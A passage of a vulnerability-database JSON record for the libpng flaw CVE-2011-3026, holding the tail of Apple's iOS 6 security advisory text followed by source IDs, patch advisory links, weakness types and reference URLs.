the\nuser to believe a secure connection had been established. This issue\nwas addressed by removing these characters from page titles. \nCVE-ID\nCVE-2012-3742 : Boku Kihara of Lepidum\n\nSafari\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Passwords may autocomplete even when the site specifies that\nautocomplete should be disabled\nDescription: Password input elements with the autocomplete attribute\nset to \"off\" were being autocompleted. This issue was addressed\nthrough improved handling of the autocomplete attribute. \nCVE-ID\nCVE-2012-0680 : Dan Poltawski of Moodle\n\nSystem Logs\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Sandboxed apps may obtain system log content\nDescription: Sandboxed apps had read access to /var/log directory,\nwhich may allow them to obtain sensitive information contained in\nsystem logs. This issue was addressed by denying sandboxed apps\naccess to the /var/log directory. \nCVE-ID\nCVE-2012-3743\n\nTelephony\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: An SMS message may appear to have been sent by an arbitrary\nuser\nDescription: Messages displayed the return address of an SMS message\nas the sender. Return addresses may be spoofed. This issue was\naddressed by always displaying the originating address instead of the\nreturn address. \nCVE-ID\nCVE-2012-3744 : pod2g\n\nTelephony\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: An SMS message may disrupt cellular connectivity\nDescription: An off-by-one buffer overflow existed in the handling\nof SMS user data headers. This issue was addressed through improved\nbounds checking. \nCVE-ID\nCVE-2012-3745 : pod2g\n\nUIKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: An attacker that gains access to a device\u0027s filesystem may\nbe able to read files that were being displayed in a UIWebView\nDescription: Applications that use UIWebView may leave unencrypted\nfiles on the file system even when a passcode is enabled. This issue\nwas addressed through improved use of data protection. \nCVE-ID\nCVE-2012-3746 : Ben Smith of Box\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in WebKit. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2011-3016 : miaubiz\nCVE-2011-3021 : Arthur Gerkis\nCVE-2011-3027 : miaubiz\nCVE-2011-3032 : Arthur Gerkis\nCVE-2011-3034 : Arthur Gerkis\nCVE-2011-3035 : wushi of team509 working with iDefense VCP, Arthur\nGerkis\nCVE-2011-3036 : miaubiz\nCVE-2011-3037 : miaubiz\nCVE-2011-3038 : miaubiz\nCVE-2011-3039 : miaubiz\nCVE-2011-3040 : miaubiz\nCVE-2011-3041 : miaubiz\nCVE-2011-3042 : miaubiz\nCVE-2011-3043 : miaubiz\nCVE-2011-3044 : Arthur Gerkis\nCVE-2011-3050 : miaubiz\nCVE-2011-3053 : miaubiz\nCVE-2011-3059 : Arthur Gerkis\nCVE-2011-3060 : miaubiz\nCVE-2011-3064 : Atte Kettunen of OUSPG\nCVE-2011-3068 : miaubiz\nCVE-2011-3069 : miaubiz\nCVE-2011-3071 : pa_kt working with HP\u0027s Zero Day Initiative\nCVE-2011-3073 : Arthur Gerkis\nCVE-2011-3074 : Slawomir Blazek\nCVE-2011-3075 : miaubiz\nCVE-2011-3076 : miaubiz\nCVE-2011-3078 : Martin Barbella of the Google Chrome Security Team\nCVE-2011-3081 : miaubiz\nCVE-2011-3086 : Arthur Gerkis\nCVE-2011-3089 : Skylined of the Google Chrome Security Team, miaubiz\nCVE-2011-3090 : Arthur Gerkis\nCVE-2011-3105 : miaubiz\nCVE-2011-3913 : Arthur Gerkis\nCVE-2011-3924 : Arthur Gerkis\nCVE-2011-3926 : Arthur Gerkis\nCVE-2011-3958 : miaubiz\nCVE-2011-3966 : Aki Helin of OUSPG\nCVE-2011-3968 : Arthur Gerkis\nCVE-2011-3969 : Arthur Gerkis\nCVE-2011-3971 : Arthur Gerkis\nCVE-2012-0682 : Apple Product Security\nCVE-2012-0683 : Dave Mandelin of Mozilla\nCVE-2012-1520 : Martin Barbella of the Google Chrome Security Team\nusing AddressSanitizer, Jose A. Vazquez of spa-s3c.blogspot.com\nworking with iDefense VCP\nCVE-2012-1521 : Skylined of the Google Chrome Security Team, Jose A. \nVazquez of spa-s3c.blogspot.com working with iDefense VCP\nCVE-2012-2818 : miaubiz\nCVE-2012-3589 : Dave Mandelin of Mozilla\nCVE-2012-3590 : Apple Product Security\nCVE-2012-3591 : Apple Product Security\nCVE-2012-3592 : Apple Product Security\nCVE-2012-3593 : Apple Product Security\nCVE-2012-3594 : miaubiz\nCVE-2012-3595 : Martin Barbella of Google Chrome Security\nCVE-2012-3596 : Skylined of the Google Chrome Security Team\nCVE-2012-3597 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3598 : Apple Product Security\nCVE-2012-3599 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3600 : David Levin of the Chromium development community\nCVE-2012-3601 : Martin Barbella of the Google Chrome Security Team\nusing AddressSanitizer\nCVE-2012-3602 : miaubiz\nCVE-2012-3603 : Apple Product Security\nCVE-2012-3604 : Skylined of the Google Chrome Security Team\nCVE-2012-3605 : Cris Neckar of the Google Chrome Security team\nCVE-2012-3608 : Skylined of the Google Chrome Security Team\nCVE-2012-3609 : Skylined of the Google Chrome Security Team\nCVE-2012-3610 : Skylined of the Google Chrome Security Team\nCVE-2012-3611 : Apple Product Security\nCVE-2012-3612 : Skylined of the Google Chrome Security Team\nCVE-2012-3613 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3614 : Yong Li of Research In Motion, Inc. \nCVE-2012-3615 : Stephen Chenney of the Chromium development community\nCVE-2012-3617 : Apple Product Security\nCVE-2012-3618 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3620 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3624 : Skylined of the Google Chrome Security Team\nCVE-2012-3625 : Skylined of Google Chrome Security Team\nCVE-2012-3626 : Apple Product Security\nCVE-2012-3627 : Skylined and Abhishek Arya (Inferno) of Google Chrome\nSecurity team\nCVE-2012-3628 : Apple Product Security\nCVE-2012-3629 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3630 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3631 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3633 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3634 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3635 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3636 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3637 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3638 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3639 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3640 : miaubiz\nCVE-2012-3641 : Slawomir Blazek\nCVE-2012-3642 : miaubiz\nCVE-2012-3644 : miaubiz\nCVE-2012-3645 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3646 : Julien Chaffraix of the Chromium development\ncommunity, Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3647 : Skylined of the Google Chrome Security Team\nCVE-2012-3648 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3651 : Abhishek Arya (Inferno) and Martin Barbella of the\nGoogle Chrome Security Team\nCVE-2012-3652 : Martin Barbella of Google Chrome Security Team\nCVE-2012-3653 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3655 : Skylined of the Google Chrome Security Team\nCVE-2012-3656 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3658 : Apple\nCVE-2012-3659 : Mario Gomes of netfuzzer.blogspot.com, Abhishek Arya\n(Inferno) of the Google Chrome Security Team\nCVE-2012-3660 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3661 : Apple Product Security\nCVE-2012-3663 : Skylined of Google Chrome Security Team\nCVE-2012-3664 : Thomas Sepez of the Chromium development community\nCVE-2012-3665 : Martin Barbella of Google Chrome Security Team using\nAddressSanitizer\nCVE-2012-3666 : Apple\nCVE-2012-3667 : Trevor Squires of propaneapp.com\nCVE-2012-3668 : Apple Product Security\nCVE-2012-3669 : Apple Product Security\nCVE-2012-3670 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam, Arthur Gerkis\nCVE-2012-3671 : Skylined and Martin Barbella of the Google Chrome\nSecurity Team\nCVE-2012-3672 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3673 : Abhishek Arya (Inferno) of the Google Chrome Security\nTeam\nCVE-2012-3674 : Skylined of Google Chrome Security Team\nCVE-2012-3676 : Julien Chaffraix of the Chromium development\ncommunity\nCVE-2012-3677 : Apple\nCVE-2012-3678 : Apple Product Security\nCVE-2012-3679 : Chris Leary of Mozilla\nCVE-2012-3680 : Skylined of Google Chrome Security Team\nCVE-2012-3681 : Apple\nCVE-2012-3682 : Adam Barth of the Google Chrome Security Team\nCVE-2012-3683 : wushi of team509 working with iDefense VCP\nCVE-2012-3684 : kuzzcc\nCVE-2012-3686 : Robin Cao of Torch Mobile (Beijing)\nCVE-2012-3703 : Apple Product Security\nCVE-2012-3704 : Skylined of the Google Chrome Security Team\nCVE-2012-3706 : Apple Product Security\nCVE-2012-3708 : Apple\nCVE-2012-3710 : James Robinson of Google\nCVE-2012-3747 : David Bloom of Cue\n\nWebKit\nAvailable for: iPhone 3GS, iPhone 4, iPhone 4S,\niPod touch (3rd generation) and later, iPad, iPad 2\nImpact: Visiting a maliciously crafted website may lead to a cross-\nsite disclosure of information\nDescription: A cross-origin issue existed in the handling of CSS\nproperty values. This issue was addressed through improved origin\ntracking. \nCVE-ID\nCVE-2012-3691 : Apple\n\nWebKit\nAvailable for: iPhone 3GS, iPhone 4, iPhone 4S,\niPod touch (3rd generation) and later, iPad, iPad 2\nImpact: A malicious website may be able to replace the contents of\nan iframe on another site\nDescription: A cross-origin issue existed in the handling of iframes\nin popup windows. This issue was addressed through improved origin\ntracking. \nCVE-ID\nCVE-2011-3067 : Sergey Glazunov\n\nWebKit\nAvailable for: iPhone 3GS, iPhone 4, iPhone 4S,\niPod touch (3rd generation) and later, iPad, iPad 2\nImpact: Visiting a maliciously crafted website may lead to a cross-\nsite disclosure of information\nDescription: A cross-origin issue existed in the handling of iframes\nand fragment identifiers. This issue was addressed through improved\norigin tracking. \nCVE-ID\nCVE-2012-2815 : Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt,\nand Dan Boneh of the Stanford University Security Laboratory\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Look-alike characters in a URL could be used to masquerade a\nwebsite\nDescription: The International Domain Name (IDN) support and Unicode\nfonts embedded in Safari could have been used to create a URL which\ncontains look-alike characters. These could have been used in a\nmalicious website to direct the user to a spoofed site that visually\nappears to be a legitimate domain. This issue was addressed by\nsupplementing WebKit\u0027s list of known look-alike characters. Look-\nalike characters are rendered in Punycode in the address bar. \nCVE-ID\nCVE-2012-3693 : Matt Cooley of Symantec\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to a cross-\nsite scripting attack\nDescription: A canonicalization issue existed in the handling of\nURLs. This may have led to cross-site scripting on sites which use\nthe location.href property. This issue was addressed through improved\ncanonicalization of URLs. \nCVE-ID\nCVE-2012-3695 : Masato Kinugawa\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to HTTP\nrequest splitting\nDescription: An HTTP header injection issue existed in the handling\nof WebSockets. This issue was addressed through improved WebSockets\nURI sanitization. \nCVE-ID\nCVE-2012-3696 : David Belcher of the BlackBerry Security Incident\nResponse Team\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A maliciously crafted website may be able to spoof the value\nin the URL bar\nDescription: A state management issue existed in the handling of\nsession history. Navigations to a fragment on the current page may\ncause Safari to display incorrect information in the URL bar. This\nissue was addressed through improved session state tracking. \nCVE-ID\nCVE-2011-2845 : Jordi Chancel\n\nWebKit\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to the\ndisclosure of the disclosure of memory contents\nDescription: An uninitialized memory access issue existed in the\nhandling of SVG images. This issue was addressed through improved\nmemory initialization. \nCVE-ID\nCVE-2012-3650 : Apple\n\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update will be \"6.0\". \n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.17 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJQWeYHAAoJEPefwLHPlZEwFlwP/1Ib/2m8K7orlPb3zmsKTyjo\n3T0rFqu1LbXNzwLRhan7E7KiJoQ7U6yVO4045o/19AYZM+zGVNnHsCkUc3+Vcpa5\nTZIM9Rik2iXKMxzttFfc5tvhE1u18PstsDLU/jvyW+s3XxMVL54wnSmW1R+P0de0\n8+Q++IANogUj+scJzQkTaFDNDN5v1p0BT0+cifCcqktXB4H/PoaQ7drIWiDGYB/9\nn4IL5AjM0BJBzWkldfjPimZ0BseSA0BxdeVCopmAgdnigyB60G4cWGzkU7E35VnP\ndWgdU9rnIIvGGe/vP912f7AoPtWs1b8n6DYCJgGRXvaRfPoHFUlXaRoVB6vJlMVs\nJXyMrw/RSDfYEgJdNbFOSxyJXHUkTkt4+aNW4KcoMR6raI/W5zKDyMEICw1wpkwP\nid6Dz4e6ncf+cfvAFqXpk02OC7iJqn71IJN2MvU/hC7797l++PINIoOHwJZolt+T\nxL3wV8p3Lk8K6lZx3Q9Tu6Dd7GYkxtjLCgV1NgdHOwPKDUOJ47oG6RjZAd6hpicp\nRqYXbk5bJpd3nZv+X6FrCZqGfeuwREWW7FJ0dI+/8ohlnisTz16f48W9FtuN3HIj\nbmxFJ46P4LGxrizwDSdBngxf3Utkh+7hGLuMH51/jR8+tCqDIEgpKBA+2F+IOmyP\nXtT4lS60xKz63YSg79dd\n=LvMt\n-----END PGP SIGNATURE-----\n. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-3026"
},
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "PACKETSTORM",
"id": "109898"
},
{
"db": "PACKETSTORM",
"id": "118291"
},
{
"db": "PACKETSTORM",
"id": "109897"
},
{
"db": "PACKETSTORM",
"id": "114070"
},
{
"db": "PACKETSTORM",
"id": "109835"
},
{
"db": "PACKETSTORM",
"id": "109836"
},
{
"db": "PACKETSTORM",
"id": "116791"
},
{
"db": "PACKETSTORM",
"id": "110096"
}
],
"trust": 2.88
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-50971",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50971"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-3026",
"trust": 2.3
},
{
"db": "SECUNIA",
"id": "49660",
"trust": 1.2
},
{
"db": "SECUNIA",
"id": "48110",
"trust": 1.2
},
{
"db": "SECUNIA",
"id": "48016",
"trust": 1.2
},
{
"db": "CERT/CC",
"id": "VU#849841",
"trust": 1.0
},
{
"db": "BID",
"id": "56610",
"trust": 0.9
},
{
"db": "SECTRACK",
"id": "1027799",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "51362",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "87619",
"trust": 0.8
},
{
"db": "BID",
"id": "52049",
"trust": 0.4
},
{
"db": "CERT/CC",
"id": "VU#523889",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "109836",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "109898",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "109835",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "109897",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "110096",
"trust": 0.2
},
{
"db": "SECUNIA",
"id": "51365",
"trust": 0.2
},
{
"db": "CNNVD",
"id": "CNNVD-201211-461",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-59558",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "116792",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109833",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110263",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109838",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109900",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109791",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109967",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-201202-339",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-50971",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2011-3026",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "118291",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "114070",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "116791",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "PACKETSTORM",
"id": "109898"
},
{
"db": "PACKETSTORM",
"id": "118291"
},
{
"db": "PACKETSTORM",
"id": "109897"
},
{
"db": "PACKETSTORM",
"id": "114070"
},
{
"db": "PACKETSTORM",
"id": "109835"
},
{
"db": "PACKETSTORM",
"id": "109836"
},
{
"db": "PACKETSTORM",
"id": "116791"
},
{
"db": "PACKETSTORM",
"id": "110096"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"id": "VAR-201202-0137",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
}
],
"trust": 0.02
},
"last_update_date": "2026-03-09T20:07:10.016000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Red Hat: Critical: thunderbird security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120140 - Security Advisory"
},
{
"title": "Red Hat: Critical: seamonkey security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120141 - Security Advisory"
},
{
"title": "Red Hat: Critical: xulrunner security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120143 - Security Advisory"
},
{
"title": "Red Hat: Critical: firefox security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120142 - Security Advisory"
},
{
"title": "Red Hat: Important: libpng security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120317 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: CVE-2011-3026",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=e819467ec1d6eb370af249e8c57643ae"
},
{
"title": "Ubuntu Security Notice: xulrunner-1.9.2 vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1367-4"
},
{
"title": "Ubuntu Security Notice: thunderbird vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1367-3"
},
{
"title": "Ubuntu Security Notice: firefox vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1367-2"
},
{
"title": "Amazon Linux AMI: ALAS-2012-049",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2012-049"
},
{
"title": "Mozilla: Mozilla Foundation Security Advisory 2012-11",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=2012-11"
},
{
"title": "Ubuntu Security Notice: libpng vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1367-1"
},
{
"title": "Mozilla: libpng integer overflow",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=5af0471059f077bf7e3d2b0ef3aef299"
},
{
"title": "Ubuntu Security Notice: thunderbird vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1369-1"
},
{
"title": "cve-2011-3026-firefox",
"trust": 0.1,
"url": "https://github.com/argp/cve-2011-3026-firefox "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/CVEDB/PoC-List "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2011-3026"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-190",
"trust": 1.1
},
{
"problemtype": "CWE-189",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.5,
"url": "http://googlechromereleases.blogspot.com/2012/02/chrome-stable-update.html"
},
{
"trust": 1.3,
"url": "http://security.gentoo.org/glsa/glsa-201206-15.xml"
},
{
"trust": 1.2,
"url": "http://lists.apple.com/archives/security-announce/2012/sep/msg00003.html"
},
{
"trust": 1.2,
"url": "http://lists.apple.com/archives/security-announce/2012/sep/msg00004.html"
},
{
"trust": 1.2,
"url": "http://code.google.com/p/chromium/issues/detail?id=112822"
},
{
"trust": 1.2,
"url": "http://support.apple.com/kb/ht5501"
},
{
"trust": 1.2,
"url": "http://support.apple.com/kb/ht5503"
},
{
"trust": 1.2,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a15032"
},
{
"trust": 1.2,
"url": "http://secunia.com/advisories/48016"
},
{
"trust": 1.2,
"url": "http://secunia.com/advisories/48110"
},
{
"trust": 1.2,
"url": "http://secunia.com/advisories/49660"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00023.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00020.html"
},
{
"trust": 0.9,
"url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=\u0026suid=20121120_00"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/bid/56610"
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/products/idol-modules-connectors/index.en.html"
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/technology/idol-functionality-information-connectivity/index.en.html"
},
{
"trust": 0.8,
"url": "https://customers.autonomy.com"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/2458544"
},
{
"trust": 0.8,
"url": "http://www.youtube.com/watch?v=28_lus_g0u4"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/id/1027799"
},
{
"trust": 0.8,
"url": "http://www.osvdb.org/show/osvdb/87619"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/51362 "
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/news/releases/2004/0803a.en.html"
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/news/releases/2008/0701.en.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3026"
},
{
"trust": 0.4,
"url": "http://www.kb.cert.org/vuls/id/523889"
},
{
"trust": 0.3,
"url": "http://support.apple.com/kb/ht5504"
},
{
"trust": 0.3,
"url": "http://www.libpng.org/pub/png/libpng.html"
},
{
"trust": 0.3,
"url": "http://blog.mozilla.com/security/2012/02/17/mozilla-releases-to-address-cve-2011-3026/"
},
{
"trust": 0.3,
"url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_libpng2"
},
{
"trust": 0.3,
"url": "http://www.srware.net/forum/viewtopic.php?f=18\u0026t=3521"
},
{
"trust": 0.3,
"url": "http://www.palemoon.org/releasenotes.shtml"
},
{
"trust": 0.3,
"url": "http://www.palemoon.org/releasenotes-ng.shtml"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100157180"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100157471"
},
{
"trust": 0.3,
"url": "https://downloads.avaya.com/css/p8/documents/100160998"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21620982"
},
{
"trust": 0.3,
"url": "http://www.mozilla.org/security/announce/2012/mfsa2012-11.html"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004302"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21627992"
},
{
"trust": 0.3,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21626697"
},
{
"trust": 0.2,
"url": "http://www.ubuntu.com/usn/usn-1367-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3048"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/kb/docs/doc-11259"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/#package"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.2,
"url": "http://bugzilla.redhat.com/):"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/security/data/cve/cve-2011-3026.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.1,
"url": "https://support.symantec.com/us/en/article.symsa1262.html"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=27482"
},
{
"trust": 0.1,
"url": "https://vulmon.com/vulnerabilitydetails?qid=cve-2012-6277"
},
{
"trust": 0.1,
"url": "https://www.energy.gov/cio/articles/v-118-ibm-lotus-domino-multiple-vulnerabilities"
},
{
"trust": 0.1,
